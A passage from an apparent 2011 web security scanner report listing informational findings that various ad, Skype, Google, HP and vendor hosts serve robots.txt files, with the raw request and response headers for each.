GET /robots.txt HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:42 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 21:51:49 GMT
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /


23.50. http://pixel.mathtag.com/event/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6818 26648
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

23.51. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-46B_c711bvEMM.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 21:13:41 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 21:13:41 GMT
Server: QS

User-agent: *
Disallow: /

23.52. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 16:19:50 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.53. http://rotation.linuxnewmedia.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rotation.linuxnewmedia.com
Path:   /www/delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rotation.linuxnewmedia.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:57 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Wed, 08 Apr 2009 14:18:34 GMT
ETag: "208c3c-17a-4670bce858280"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.54. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYwdMDIIDWAyoo4-kAAP______________________________________________PzIJwekAAP____8D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYwdMDIIDWAyoo4-kAAP______________________________________________PzIJwekAAP____8D

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 21:24:37 GMT
Expires: Sun, 04 Sep 2011 21:24:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.55. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 21:24:38 GMT
Expires: Sun, 04 Sep 2011 21:24:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.56. http://samples.msdn.microsoft.com/workshop/samples/author/dhtml/refs/insertScript_2.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://samples.msdn.microsoft.com
Path:   /workshop/samples/author/dhtml/refs/insertScript_2.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: samples.msdn.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 Apr 2007 21:37:21 GMT
Accept-Ranges: bytes
ETag: "1c23b497ca77c71:0"
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:29:37 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.57. http://search2.skype.com/search/search.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search2.skype.com
Path:   /search/search.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search2.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:16:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 23 Nov 2010 22:39:42 GMT
ETag: "7b4095-11e-495c00c738780"
Accept-Ranges: bytes
Content-Length: 286
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# $Id: robots.txt 16548 2009-11-10 06:29:43Z francis $
#
# Standard robots.txt for search system distribution. Must be located in
# the top-level directory of the web server document hierarchy.
#
#
...[SNIP]...

23.58. https://secure.skype.com/account/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skype.com
Path:   /account/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.skype.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 21:27:14 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Tue, 26 Jul 2011 07:00:18 GMT
ETag: "c640d9-1a-4a8f37c040480"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent

User-agent: *
Disallow: /

23.59. https://secure.skypeassets.com/i/css/turbo/full.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skypeassets.com
Path:   /i/css/turbo/full.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.skypeassets.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 16 Jul 2010 12:03:15 GMT
ETag: "a2-48b8000f566c0"
Content-Type: text/plain; charset=utf-8
Content-Language: en
Date: Sun, 04 Sep 2011 18:08:48 GMT
Content-Length: 162
Connection: close

User-agent: *
Disallow: /temp/
Disallow: /store/accessories/
Disallow: */downloading/
Disallow: /go/help.ticket.submit$

Sitemap: http://www.skype.com/sitemap.xml

23.60. http://shop.skype.com/apps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shop.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:08:59 GMT
Server: Apache
Last-Modified: Tue, 03 Mar 2009 09:50:54 GMT
ETag: "36ebf0-b9-46433defbdb80"
Accept-Ranges: bytes
Content-Length: 185
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /tmp/
Disallow: /temp/
Disallow: /store/accessories/
Disallow: */downloading/
Disallow: /go/help.ticket.submit$

Sitemap: http://www.skype.com/sitemap.xml

23.61. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: skypec.i.lithium.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:24:09 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 03 Aug 2011 08:10:05 GMT
ETag: "196198d-197-4a995644f9140"
Accept-Ranges: bytes
Content-Length: 407
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

23.62. https://support.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: support.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:08:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 129
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /*/search_first
Disallow: /*/support_request
Disallow: /support_request
Disallow: /search_first
Allow: /

23.63. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f47 32583
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

23.64. http://tag.admeld.com/ad/js/179/lijit/728x90/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/179/lijit/728x90/ros

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "e880243-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 05 Sep 2011 02:30:57 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

User-agent: *
Disallow: /

23.65. http://translate.googleapis.com/translate_a/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.googleapis.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Mon, 05 Sep 2011 02:23:18 GMT
Expires: Mon, 05 Sep 2011 02:23:18 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=translate.googleapis.com
Set-Cookie: PREF=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.translate.googleapis.com
Set-Cookie: PREF=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=googleapis.com
Set-Cookie: PREF=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.googleapis.com
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.66. http://ui.skype.com/ui/0/5.5.0.114./en/getlatestversion  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.114./en/getlatestversion

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ui.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:01:13 GMT
Server: Apache
Last-Modified: Wed, 16 May 2007 16:31:26 GMT
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Language: en

User-agent: *
Disallow: /

23.67. http://vap1den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vap1den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 22:27:46 GMT
ETag: "2680d7-17a-4aacf1f3ebc80"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.68. http://vap1iad1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1iad1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vap1iad1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:40:54 GMT
ETag: "755d8-17a-4aad024ca4d80"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding
Cache-Control: must-revalidate
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.69. http://vap1iad2.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1iad2.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vap1iad2.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:49:19 GMT
ETag: "fd879-17a-4aad042e3fdc0"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding
Cache-Control: must-revalidate
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.70. http://vap1sfo1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1sfo1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vap1sfo1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:50:24 GMT
ETag: "79565-17a-4aad046c3d000"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding
Cache-Control: must-revalidate
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.71. http://vap2den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap2den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vap2den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:26 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 22:28:34 GMT
ETag: "1900d5-17a-4aacf221b2880"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.72. http://vap2iad1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap2iad1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vap2iad1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:32:27 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:47:33 GMT
ETag: "a3970-17a-4aad03c928f40"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding
Cache-Control: must-revalidate
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.73. http://vap3den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap3den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vap3den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:07 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 22:28:52 GMT
ETag: "2100e4-17a-4aacf232dd100"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.74. http://welcome.hp-ww.com/country/us/eng/js/hub/metrics.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://welcome.hp-ww.com
Path:   /country/us/eng/js/hub/metrics.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: welcome.hp-ww.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Length: 454
Content-Type: text/plain
ETag: "49c5a3761f940"
Expires: Mon, 05 Sep 2011 00:41:01 GMT
Last-Modified: Tue, 15 Feb 2011 23:06:37 GMT
Accept-Ranges: bytes
Server: Apache
Date: Sun, 04 Sep 2011 22:41:01 GMT
Connection: close

#$Header: robots.txt,v 1.19 2009/10/19 16:47:17 autreja Exp $ $Locker: $

# robots.txt file for www.hp.com
# send e-mail to hp<dot>comOperations<at>hp<dot>com for updates or problems

User-agent
...[SNIP]...

23.75. http://www-cdn.dell.com/content/public/menu.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-cdn.dell.com
Path:   /content/public/menu.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www-cdn.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=utf-8
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:07 GMT
Content-Length: 5562
Connection: close

User-agent: *
Disallow:
Allow:/*/compare.aspx*s=biz*
Allow:/*/compare.aspx*s=hied*
Allow:/*/compare.aspx*s=hea*
Allow:/*/compare.aspx*s=fed*
Allow:/*/compare.aspx*s=slg*
Allow:/*/compare.aspx*s
...[SNIP]...

23.76. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cgisecurity.com
Path:   /lib/XmlHTTPRequest.shtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cgisecurity.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web039
X-Webserver: oak-tp-web039
Vary: cookie
Expires: Sat, 27 Aug 2011 00:29:40 GMT
Last-Modified: Sun, 02 Nov 2008 21:12:00 GMT
Content-Disposition: inline; filename=robots.txt
Content-Type: text/plain; charset=utf-8
Keep-Alive: timeout=300, max=100
Content-Length: 130
Date: Mon, 05 Sep 2011 02:23:15 GMT
X-Varnish: 1021223921 110215018
Age: 798815
Via: 1.1 varnish
Connection: close

# domo arigato mr. roboto

User-agent: *
Disallow: /secret/
Disallow: /cgi-bin/
Disallow: /nikto-mirror/
Disallow: /archive/

23.77. http://www.google.com/adsense/search/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /adsense/search/ads.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 21:17:37 GMT
Expires: Sun, 04 Sep 2011 21:17:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.78. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 16:18:08 GMT
Expires: Sun, 04 Sep 2011 16:18:08 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.79. http://www.hp.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hp.com
Path:   /search/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:38 GMT
Server: Apache
Last-Modified: Tue, 15 Feb 2011 23:06:37 GMT
ETag: "49c5a3761f940"
Accept-Ranges: bytes
Content-Length: 454
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:19:38 GMT
Connection: close
Content-Type: text/plain

#$Header: robots.txt,v 1.19 2009/10/19 16:47:17 autreja Exp $ $Locker: $

# robots.txt file for www.hp.com
# send e-mail to hp<dot>comOperations<at>hp<dot>com for updates or problems

User-agent
...[SNIP]...

23.80. http://www.ibm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:17 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 08 Dec 2010 21:57:10 GMT
ETag: "7bb-33f5b980"
Accept-Ranges: bytes
Content-Length: 1979
Kp-eeAlive: timeout=10, max=32
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.45 2010/12/08 21:56:35 scottrad Exp $
#
# This is a file retrieved by webwalkers a.k.a. spiders that
# conform to a defacto standard.
# See <URL:http://www.robotstxt.org/wc/excl
...[SNIP]...

23.81. http://www.imiclk.com/cgi/r.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imiclk.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 22 Mar 2011 15:09:46 GMT
ETag: "72c06c-1a-49f13a27ae280"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 21:13:42 GMT
Connection: close

User-agent: *
Disallow: /

23.82. http://www.imperva.com/products/wsc_web-application-firewall.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imperva.com
Path:   /products/wsc_web-application-firewall.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imperva.com

Response

HTTP/1.1 200 OK
Content-Length: 112
Content-Type: text/plain
Last-Modified: Wed, 18 Aug 2010 17:53:53 GMT
Accept-Ranges: bytes
ETag: "c44f8a52fe3ecb1:23b6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:18:22 GMT
Connection: close

User-agent: *
Sitemap: http://www.imperva.com/sitemap_google.xml
Disallow: /extranet/
Disallow: /scripts_tal/

23.83. http://www.lijit.com/delivery/fp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/fp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n10 ( lax-agg-n58), rf-ms lax-agg-n58 ( origin>CONN)
ETag: "2c844d-c1-4aacd6d8fc980"
Cache-Control: max-age=0
Expires: Mon, 05 Sep 2011 02:30:51 GMT
Age: 0
Content-Length: 193
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 18 Aug 2011 20:26:30 GMT
Connection: close

User-agent: *
Disallow: /pvs/
Disallow: /custom
Disallow: /search/
Disallow: /research/
Disallow: /informers
Disallow: /users/
Disallow: /res/images/empty.gif
Disallow: /swr
Disallow: /expert/

23.84. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livehelpnow.net

Response

HTTP/1.1 200 OK
Content-Length: 31
Content-Type: text/plain
Last-Modified: Tue, 11 May 2010 21:26:54 GMT
Accept-Ranges: bytes
ETag: "d22caead50f1ca1:3cdd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:18:15 GMT
Connection: close

User-agent: *
Disallow: /cms

23.85. http://www.radware.com/Resources/AppWallSolution.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radware.com
Path:   /Resources/AppWallSolution.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radware.com

Response

HTTP/1.1 200 OK
Content-Length: 1216
Content-Type: text/plain
Last-Modified: Mon, 04 May 2009 15:13:02 GMT
Accept-Ranges: bytes
ETag: "05314d1caccc91:417"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:18:50 GMT
Connection: close


Sitemap: http://www.radware.com/sitemap.xml

User-agent: *
Disallow: /content
Disallow: /admin
Disallow: /administrator
Disallow: /afe
Disallow: /App_Code
Disallow: /App_WebReferences
Disal
...[SNIP]...

23.86. http://www.skype.com/go/registration  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /go/registration

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:15 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 12:03:15 GMT
ETag: "d74a86-a2-48b8000f566c0"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Language: en

